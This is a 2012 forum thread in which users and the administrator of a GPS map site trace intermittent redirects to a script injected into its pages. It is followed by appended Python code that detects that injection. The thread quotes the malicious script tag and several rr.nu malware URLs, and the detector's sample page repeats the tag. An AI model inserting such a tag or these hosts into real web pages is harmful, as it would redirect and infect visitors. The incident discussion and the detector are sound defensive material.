Author Topic: Domain forwarding issue  (Read 40065 times)

Seldom

  • Expert Advisor
  • *****
  • Posts: 1852
  • Karma: 19
Re: Domain forwarding issue
« Reply #15 on: March 02, 2012, 09:12:35 AM »
Bottom line, the problem is on this website, not your machine - unless when the script runs it infects your machine with a virus...that could be possible.

Not sure this explains why the problem went away when I deleted my browsing history.  Is it possible that browsing history can be infected?
« Last Edit: March 02, 2012, 09:15:50 AM by Seldom »

jbensman

  • Expert Advisor
  • *****
  • Posts: 422
  • Karma: 7
Re: Domain forwarding issue
« Reply #16 on: March 02, 2012, 09:36:03 AM »
I just deleted my browsing history and temp files.  I then tried the site again with IE9 and I got redirected.

Is there any danger in downloading the maps?

Boyd

  • Expert Advisor
  • *****
  • Posts: 3849
  • Karma: 43
Re: Domain forwarding issue
« Reply #17 on: March 02, 2012, 09:57:20 AM »
Something is definitely wrong here. Normally I use Firefox 7.01 on Windows. Am not getting the redirect there now. I tried IE 7 just now (which I never really use) and the site is ok there too.

So I tried Safari 5.1.3 on MacOS X, and my usual link to the forum - http://forums.gpsfiledepot.com/ just redirected me to the Russian site. Now it is working normally again.

If I look at the "activity" window in Safari, there is an entry for

http://rmore79riveru.rr.nu/nl.php?p=d

Googling this, I see that this may be malware infecting the forum software: http://pastebin.com/wKkNk7n6

I'm going to use the "report to moderator" button to make sure that Oz and Indrid are aware of this.

Seldom

  • Expert Advisor
  • *****
  • Posts: 1852
  • Karma: 19
Re: Domain forwarding issue
« Reply #18 on: March 02, 2012, 10:04:12 AM »
Would Anti-Virus/Firewall matter? 
I'm using BitDefender.
Also, jbensman, when I deleted my browsing history I had "Preserve Favorites Website Data" unchecked.

Boyd

  • Expert Advisor
  • *****
  • Posts: 3849
  • Karma: 43
Re: Domain forwarding issue
« Reply #19 on: March 02, 2012, 10:16:19 AM »
Safari has an "activity" window that shows everything happening when you open a page. On almost every page I access, there are php scripts being executed on some foreign site. Right now I see one for http://astre09atyqr.rr.nu/nl.php?p=d

If I go to the forum homepage there's a link to http://asin54grepl.rr.nu/nl.php?p=d

If I do it again then it's http://ionbr82eastna.rr.nu/nl.php?p=d

There seem to be a large number of permutations of similar links. I don't see these listed in Firefox on Windows, so maybe they are being blocked. But something must be infected somewhere on the site...

Boyd

  • Expert Advisor
  • *****
  • Posts: 3849
  • Karma: 43
Re: Domain forwarding issue
« Reply #20 on: March 02, 2012, 10:23:10 AM »
Googling around some more, I found these:

http://webmasters.stackexchange.com/questions/26475/is-someone-hijacking-my-site

http://www.google.vu/support/forum/p/Webmasters/thread?tid=0c8c5f8c216cc9bd&hl=en

Quote
This line of code at the end of the homepage.

< sc ript src="http://ionis90landsi.rr.nu/nl.php?p=d"> < / sc ript >

From what I have seen this hack always includes a backdoor on the site.

-Oz-

  • Map Maker!
  • Administrator
  • Expert Advisor
  • *****
  • Posts: 1579
  • Karma: 27
    • GPSFileDepot
Re: Domain forwarding issue
« Reply #21 on: March 02, 2012, 11:39:32 AM »
I have reuploaded original files from my computer however I am not sure how the exploit occurred since the pages are custom code (not wordpress or anything).

Passwords have been changed in case that was the exploit.

The site was definitely hijacked on the night of the 28th (not sure how I missed this thread).  I never noticed because I use Chrome.

However the backdoor still seems to be there which means the exploit is loaded in real time at the host.
« Last Edit: March 02, 2012, 11:44:55 AM by -Oz- »
Dan Blomberg
Administrator - GPSFileDepot
GPS Units: Garmin Dakota 20, Garmin GPSMap 60csx, Nuvi 255W, Nuvi 250W, ForeRunner 110, Fenix 2, Tactix Bravo, Foretrex 401
See/Download My Maps!

jbensman

  • Expert Advisor
  • *****
  • Posts: 422
  • Karma: 7
Re: Domain forwarding issue
« Reply #22 on: March 02, 2012, 12:16:20 PM »
I am still getting the redirect in Internet Explorer.  I tried deleting history, temp files, and files. 

Indrid Cold

  • Moderator
  • Expert Advisor
  • *****
  • Posts: 919
  • Karma: 20
Re: Domain forwarding issue
« Reply #23 on: March 02, 2012, 12:38:17 PM »
wish I could help here but I'm not getting anything out of the usual.

jbensman

  • Expert Advisor
  • *****
  • Posts: 422
  • Karma: 7
    • View Profile
Re: Domain forwarding issue
« Reply #24 on: March 02, 2012, 02:10:33 PM »
Eaparks emailed me this:


The hack/being redirected is back again, at least for me.  I'm not able to access GPSFileDepot, I'm being redirected to a site address called "rmore79riveru.rr.nu" (194.28.114.103.80).
 
I can just briefly see that there have been several posts in the Download thread on GPSFileDepot on the home page but I am redirected and blocked by Norton so I am unable to see what everyone is saying about this.  If you are able to get on GPSFileDepot you're welcome to say I'm unable to access the website if it will help in the discussion going on.  If there is a solution being discussed please advise me since I'm unable to participate in the discussion.
 
Thanks
Ed

Boyd

  • Expert Advisor
  • *****
  • Posts: 3849
  • Karma: 43
Re: Domain forwarding issue
« Reply #26 on: March 02, 2012, 02:26:44 PM »
Quote
wish I could help here but I'm not getting anything out of the usual.

You have a Mac, right? In Safari go Window > Activity then go to http://forums.gpsfiledepot.com/ and observe what happens. Hit refresh, and every time you do a different but similar url is embedded - here are two screenshots.


Indrid Cold

  • Moderator
  • Expert Advisor
  • *****
  • Posts: 919
  • Karma: 20
Re: Domain forwarding issue
« Reply #27 on: March 02, 2012, 02:41:08 PM »
Quote
You have a Mac, right?

I might have a dozen or so Macs as well as them others...

Will give it a look when I get a chance, Safari seems to be working OK on the iPhone. NO cheesecake for me:(

Boyd

  • Expert Advisor
  • *****
  • Posts: 3849
  • Karma: 43
Re: Domain forwarding issue
« Reply #28 on: March 03, 2012, 05:48:21 AM »
FYI... when I started up my computer this morning I once again was redirected to http://myustreamtv.rr.nu/2f/

And using safari, I still see activity from url's such as http://sbulle06tsconti.rr.nu/nl.php?p=d

The redirect only happened the first time, but those URL's are embedded in the activity on every page.

dbperry

  • Mapper
  • ***
  • Posts: 57
  • Karma: 3
Re: Domain forwarding issue
« Reply #29 on: March 03, 2012, 06:20:42 AM »
Quote
However the backdoor still seems to be there which means the exploit is loaded in real time at the host.

Yes, it appears that the link to the *.rr.nu script is loaded dynamically. That is why the subdomain (part of the web address before .rr.nu) is always different. I also wonder if that is why the redirect only happens sometimes - I wonder if sometimes, the dynamically loaded script is actually broken, so it doesn't redirect. That could explain the random / intermittent nature of the redirect that some people experience.

Oz, have you engaged / contacted your webhost? This is clearly at least somewhat their problem, not necessarily yours. What say they?

P.S. For me, Google Chrome (on Windows 7) appears to work OK, even with my anti-virus turned off. You may want to try that to access the site without problems. Deleting history, temp files, etc. probably won't fix the problem for you if you are having the redirect problem (since the problem really isn't on your computer), but either using a different browser or updating your anti-virus (so that it can block the script from running) might help.

Another work around that worked for me is to put "gpsfiledepot.com" in your 'restricted sites' list in Internet Explorer. Then IE will block the script from running and IE will access the site without the redirect. You might not be able to download or upload files with gpsfiledepot in your restricted sites list, but at least you would be able to get to this forum to find out when the problem gets fixed.

Dave
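
Added example, not part of any post in this thread: because the injected tag's subdomain changes on every load and the tag is added at the host, a check has to run on the served HTML and match the URL pattern rather than one fixed address. This Python code audits the script sources of a fetched page; the allowlist, the sample page and the function names are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Pattern taken from the URLs quoted in this thread: <random>.rr.nu/nl.php?p=d
CAMPAIGN_HOST = re.compile(r"^[a-z0-9]+\.rr\.nu$")
# Assumption: hosts the site legitimately loads scripts from
ALLOWED_HOSTS = {"gpsfiledepot.com", "forums.gpsfiledepot.com"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a served page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def audit_page(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (src, verdict) for each external script not on the allowlist."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src in collector.sources:
        parts = urlsplit(src)
        host = (parts.hostname or "").lower()
        if not host or host in allowed_hosts:
            continue  # relative URL or one of the site's own hosts
        if CAMPAIGN_HOST.match(host) and parts.path == "/nl.php":
            findings.append((src, "matches rr.nu/nl.php injection"))
        else:
            findings.append((src, "unexpected external host"))
    return findings


# Constructed sample: one legitimate script plus a tag appended after </html>
SAMPLE = """<html><body><script src="/Themes/default/script.js"></script>
<p>Forum index</p>
</body></html><script src="http://ionis90landsi.rr.nu/nl.php?p=d"></script>"""

if __name__ == "__main__":
    for src, verdict in audit_page(SAMPLE):
        print(verdict, src)
```

Run it against several fetches of the same page, since the thread reports that the embedded URL differs on each refresh.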